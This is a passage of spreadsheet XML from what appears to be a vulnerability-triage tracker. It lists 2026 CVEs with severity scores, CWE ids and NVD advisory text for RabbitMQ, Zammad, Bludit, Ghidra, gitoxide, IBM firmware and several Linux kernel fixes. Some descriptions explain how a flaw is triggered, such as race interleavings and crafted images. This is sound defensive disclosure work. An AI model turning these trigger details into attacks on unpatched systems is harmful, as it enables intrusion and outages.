          <t>RabbitMQ is a messaging and streaming broker. Prior to 4.3.5, an authenticated user who can bind a queue to a topic exchange and publish to it can use consecutive # segments in a binding key to make both topic matchers revisit the same trie-node and routing-key-suffix states without memoization. The matcher materializes duplicate destinations before deduplication, causing combinatorial CPU work and memory pressure that can disrupt routing for all tenants. This vulnerability is fixed in 4.3.5.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67419</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84464</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, zammad's External Data Source feature, used to look up records from an external system, did not properly verify whether a user was allowed to see a specific ticket, user, group, or organization before including its details in a request to that external system. An authenticated user, including one with only basic customer access, could exploit this by referencing another record's ID, and thereby view details of tickets, customer accounts, teams, or organizations that did not belong to them. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84464</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84465</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when Zammad checks the digital signature on an incoming S/MIME-signed email, it does not verify that the signing certificate is genuinely trusted, it only checks whether a certificate with a matching name is already stored in the system. An attacker can create their own certificate using the name of a real, previously trusted sender and use it to send a forged email. Zammad will display that email with the same "validly signed" indicator as a genuine message from the real sender, even though the attacker never had access to that sender's actual certificate or private key. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84465</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93306</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>IBM Server Firmware FW1120.00 through FW1120.01, FW1110.00 through FW1110.31, FW1060.00 through FW1060.81, and FW950.00 through FW950.H3 is affected by a vulnerability in the ASMI web interface. An unauthenticated attacker on the management network can send a malformed HTTPS request to ASMI, causing the web server to crash with possible memory corruption and generate an error log. The ASMI web interface will restart automatically; however, repeated exploitation could result in a sustained loss of access to the ASMI management interface, resulting in an integrity and availability impact.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93306</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93365</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a missing authorization vulnerability that allows authenticated users holding the Author or Editor role to read the full content of private drafts and scheduled posts belonging to any other user, including administrators, by exploiting the content-get-list AJAX endpoint in bl-kernel/ajax/content-get-list.php. Attackers can send an authenticated GET request to the admin AJAX endpoint with the draft parameter set to true, triggering getList() without ownership constraints and returning serialized page objects site-wide, exposing pre-publication material and sensitive notes stored in administrator-owned drafts.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93365</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100419</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>gitoxide gix-fs before 0.23.0 contains a path validation bypass vulnerability in the worktree checkout mechanism that allows attackers to escape the worktree directory via symlink manipulation. During forced checkout with overwrite_existing enabled, attackers can craft malicious repository trees where symlink entries replace validated directories, causing subsequent files to be written outside the worktree through the symlink for code execution or file manipulation.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100419</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100504</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions through 12.1.4 contain a stack-based out-of-bounds write vulnerability in the decompiler's leftshift128 function when processing negative shift amounts from p-code. Attackers can craft malicious binaries with specific instruction sequences that trigger the overflow when decompiled, corrupting memory and potentially achieving code execution.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100504</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97589</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix wrong return code to engine in asynch callbacks
When crypto_finalize_hash_request() or
crypto_finalize_skcipher_request() explicitly completes a request, the
do_one_request callback must return 0 to indicate successful
handling. Returning a negative error code causes the crypto engine to
assume the driver failed to take ownership and triggers a second
completion via crypto_request_complete(), resulting in a double
completion. This pattern occurs in paes_s390.c 4 times and once in
phmac_s390.c.
Fixed in phmac_do_one_request() and all four paes do_one_request
callbacks (ecb, cbc, ctr, xts) by returning 0 after explicit
finalization instead of propagating the error code.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97589</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97608</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_log: unregister loggers before per-net teardown
nf_log_syslog and nfnetlink_log unregister their per-network namespace
operations before unregistering their global logger backends. This
leaves a window where a sysctl or netlink writer can rebind the still-
registered logger after the per-net pre-exit callback cleared the old
selection.
The race looks like this:
  CPU 0                                 CPU 1
  ----                                  ----
  unregister_pernet_subsys()
    nf_log_unset(net, logger)
      net-&gt;nf.nf_loggers[pf] = NULL
                                        lock nf_log_mutex
                                        find logger in loggers[][]
                                        net-&gt;nf.nf_loggers[pf] = logger
                                        unlock nf_log_mutex
  nf_log_unregister(logger)
    lock nf_log_mutex
    loggers[pf][type] = NULL
    unlock nf_log_mutex
    synchronize_rcu()
  module exit returns
  module core frees backend memory
Later, a sysctl read or packet logging operation can dereference the
stale per-net logger pointer.
Fix this by unregistering the global logger backends before tearing down
per-net state. Once the global registrations are gone, later writers can
no longer rebind the logger. unregister_pernet_subsys() already waits
for an RCU grace period after the pre-exit callback clears the per-net
selection, while nf_log_unregister() continues to cover readers of the
global logger table.
Apply this ordering fix to both nf_log backends that combine per-net
teardown with global logger registration.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97608</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97609</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: cttimeout: prevent UAF during module unload
nf_ct_set_timeout() protects the timeout hook dereference and policy lookup
with rcu_read_lock(). cttimeout_exit(), however, unregisters the per-net
operations before it clears the hook.
This allows the following interleaving:
  CPU 0                              CPU 1
  cttimeout_exit()                   nf_ct_set_timeout()
    unregister_pernet_subsys()         rcu_read_lock()
      kfree(pernet)                     h = nf_ct_timeout_hook
                                        h-&gt;timeout_find_get()
                                          nfct_timeout_pernet()
The hook still points to ctnl_timeout_find_get() when CPU 1 looks up the
already freed per-net timeout list. KASAN reported:
  BUG: KASAN: slab-use-after-free in ctnl_timeout_find_get
  Read of size 8 by task poc/90
  Call Trace:
   ctnl_timeout_find_get+0x271/0x2a0 [nfnetlink_cttimeout]
   nf_ct_set_timeout+0x7b/0x3c0
   xt_ct_tg_check+0x724/0xb20
   xt_check_target+0x234/0xa90
   do_ipt_set_ctl+0x570/0x1270
  Allocated by task 89:
   __kmalloc_noprof+0x16e/0x460
   ops_init+0x6d/0x420
   register_pernet_operations+0x2f6/0x670
  Freed by task 91:
   kfree+0x131/0x390
   ops_undo_list+0x3d4/0x730
   unregister_pernet_operations+0x232/0x490
   unregister_pernet_subsys+0x1c/0x30
   cttimeout_exit+0x52/0x970 [nfnetlink_cttimeout]
Clear the hook and wait for existing readers before unregistering the
per-net operations. This blocks new policy lookups and ensures readers that
observed the hook finish before the per-net storage is freed.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97609</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97926</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ufs: validate cylinder group metadata before caching it
ufs_read_cylinder() copies the cylinder group index and the rotor
positions straight from the on-disk group and caches them without any
check:
	ucpi-&gt;c_cgx    = fs32_to_cpu(sb, ucg-&gt;cg_cgx);
	ucpi-&gt;c_rotor  = fs32_to_cpu(sb, ucg-&gt;cg_rotor);
	ucpi-&gt;c_frotor = fs32_to_cpu(sb, ucg-&gt;cg_frotor);
	ucpi-&gt;c_irotor = fs32_to_cpu(sb, ucg-&gt;cg_irotor);
They are then used as indices during allocation and free:
  - c_cgx indexes the cylinder summary array as
    UFS_SB(sb)-&gt;fs_cs(ucpi-&gt;c_cgx), so a value past s_ncg writes a 32
    bit count outside the s_csp allocation.
  - c_frotor becomes a bitmap scan start, start = c_frotor &gt;&gt; 3, and
    then length = ((s_fpg + 7) &gt;&gt; 3) - start. A start beyond the block
    bitmap wraps the unsigned length to a huge value, so ubh_scanc()
    walks far past the cylinder group buffers. c_irotor drives the
    inode bitmap the same way.
A crafted image can set any of these freely, turning an ordinary
allocation into an out of bounds access.
Reject a cylinder group whose recorded index does not match the group
being read, or whose rotors fall outside the group, before the metadata
is cached. Valid filesystems keep cg_cgx equal to the group number and
the rotors within the group, so only malformed images are rejected.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97926</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97931</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: us122l: Prevent write upgrades for read mappings
The hwdep mmap callback rejects read-buffer mappings that are initially
writable, but leaves VM_MAYWRITE set on mappings created with PROT_READ.
A process that can open the hwdep node O_RDWR can later use mprotect() to
make the mapping writable.
The read allocation begins with struct usb_stream. Its read_size member is
used by the fault handler to decide which pages belong to the read buffer.
The read VMA intentionally remains expandable because pcm_usb_stream uses
mremap() after reading that size. Changing read_size first can therefore
map and access pages beyond the allocation. The same member is also
consumed by usb_stream_free(), where changing it can make
free_pages_exact() release pages outside the allocation.
Clear VM_MAYWRITE for read-buffer mappings after rejecting an initially
writable VMA. This keeps the separate output-buffer mapping writable while
preventing later permission upgrades.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97931</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97953</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix TX descriptor availability check for TSO traffic
stmmac_tso_xmit() estimates the number of free TX descriptors required by
a TSO skb as:
	(skb-&gt;len - proto_hdr_len) / TSO_MAX_BUFF_SIZE + 1
which assumes the payload is split into TSO_MAX_BUFF_SIZE chunks. This
underestimates the descriptors actually consumed by stmmac_tso_allocator(),
since each fragment is mapped individually and so it needs at least one
descriptor regardless of its size. Moreover, one descriptor is used for
the L2/L3/L4 headers and, when the MSS changes, one more is consumed for
the MSS context descriptor.
For a highly fragmented TSO skb the check can therefore pass even when the
ring has too few free slots. stmmac_tso_allocator() then writes past the
available descriptors, overwriting descriptors still owned by the DMA
engine, corrupting the TX ring.
Add stmmac_tso_get_num_desc() to compute the exact number of descriptors
needed for the header, the linear payload and each fragment, plus the MSS
context descriptor when required, and use it in the availability check.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97953</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98027</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: mv88e6xxx: bound the policy rule dump by the caller's buffer size
mv88e6xxx_get_rxnfc() uses rxnfc-&gt;rule_cnt as the write index while
dumping the policy IDR, clobbering the input value before it has been
looked at.  That input is the number of entries the caller had room for.
ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN and the ioctl sizes the
buffer from the rule_cnt userspace passes in, so once an admin has
installed policy rules any user can ask for fewer slots than there are
rules and run off the end of the allocation.  A rule_cnt of 0 leaves the
buffer pointer NULL and the walk dereferences it.
Count into a local so the caller's limit survives the walk, and stop with
-EMSGSIZE once it is reached.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
